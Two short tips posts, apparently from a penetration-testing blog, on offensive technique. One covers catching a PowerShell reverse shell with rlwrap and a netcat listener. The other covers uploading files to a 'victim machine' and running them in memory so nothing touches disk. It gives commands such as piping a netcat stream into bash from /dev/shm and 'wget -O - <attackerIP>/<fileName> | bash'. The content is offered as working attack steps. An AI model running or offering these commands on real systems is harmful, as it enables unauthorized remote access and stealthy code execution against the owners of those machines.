Tips & Tricks

Improving Windows PowerShell Reverse Shells For Up/Down Arrows

When you use Netcat to catch a PowerShell reverse shell, like Nishang, you’ll notice that you won’t have the ability to use up/down arrow keys. This could be a huge pain when you’re stuck in this type of shell. However, there is a tool that we can leverage that should improve your experience with these type of shells.

To begin, we’ll download and install the tool on our system.
sudo apt install rlwrap -y

Then we’ll set up a log file on our box that will give us the input/output logging.
script reverse.log

Now we can start our Netcat listener.
rlwrap nc -nvlp <listenPort>

Then we’ll issue our exploit to start our reverse shell. Now we should have arrow keys within our Netcat session!

Tips & Tricks

File Transfer in Linux: Uploading & Executing in Memory

These example will show us uploading to a victim machine and executing the file straight into memory so that we write nothing to the hard-drive.

Method A: Using Netcat

On our attacking box, find the executable you wish to transfer and run the following command:

cat <filename> | nc -nvlp 9002

On the victim machine, change into the following directory so nothing will happen if you do write to disk.

cd /dev/shm

Then transfer and execute the file by connecting back to your netcat connection.

nc 9002 | bash

Method B: Using Wget

Host up the file using a Python web server from your Kali machine:
sudo python3 -m http.server

And then run the following command from the victim to download and execute straight into memory.
wget -O - <attackerIP>/<fileName> | bash